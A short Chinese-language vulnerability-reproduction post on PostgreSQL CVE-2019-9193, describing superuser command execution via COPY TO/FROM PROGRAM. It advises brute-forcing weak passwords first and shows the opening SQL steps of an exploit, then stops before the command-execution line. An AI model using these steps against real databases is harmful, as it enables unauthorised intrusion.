【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)
漏洞介绍
这个漏洞是一个版本漏洞
从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
利用的前提
所以要先弱口令爆破之后,然后查看是否是高权限。
exp
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text)